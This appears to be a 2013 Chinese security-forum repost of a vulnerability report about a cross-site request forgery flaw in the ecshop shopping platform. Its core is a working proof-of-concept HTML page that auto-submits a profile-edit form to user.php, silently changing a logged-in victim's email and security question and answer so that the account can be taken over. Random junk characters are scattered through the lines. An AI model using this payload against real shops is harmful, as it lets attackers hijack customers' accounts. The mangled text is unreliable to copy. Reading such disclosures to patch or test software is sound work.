找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1928|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
: w: o) T! _1 F& c/ O' @1 g4 @ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
. h4 F/ C7 E0 o8 m4 n9 C: \8 `/ H4 J3 |  u4 ^$ i+ y; p
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
; o; \2 ]' m/ Q& P9 Q5 t, y0 r9 t7 q$ p4 `5 A! A
详细说明:: r2 e/ e9 \5 X+ P/ c; E2 S
利用csrf和xss可以突破官方所说的“障碍”
% K3 |( U6 n& \xss版本已经有人说明
" H6 A0 _* \- s4 K5 c) ^+ n  ?这里给出csrf版本  {6 `6 q$ w5 x' n& T
" B8 y; h: K/ N; B2 g% ?
漏洞证明:+ ]1 G2 m  O* U+ v4 E1 ~- C
<html>! g, [* T6 m7 ~
<body>& F! `  ]: ~! W' g+ X1 g/ U: r) e
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">9 r5 D3 e% t: B  N* p  u
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">( V) H8 ^1 k/ i: H) B
<INPUT TYPE="text" NAME="act" value="act_edit_profile">8 a# u1 s3 w& q) O3 o" t
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
4 I! |; Q: W5 r- z+ J% }# c<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
1 V2 ?, ?2 K, B+ g</body>
! F) @: [+ u9 W  T<script>
- N: O2 d% V3 s; R5 O/ h$ Idocument.forms[0].submit();3 z5 r- P/ X. u/ y2 V& |3 s: ^
</script>
3 [) y- V& W; L</html>$ V  Q& `6 w* Z0 a
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
  C8 o; S* [  D' ~* N2 k0 X, h5 v3 b. y0 G" @* s# x, u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表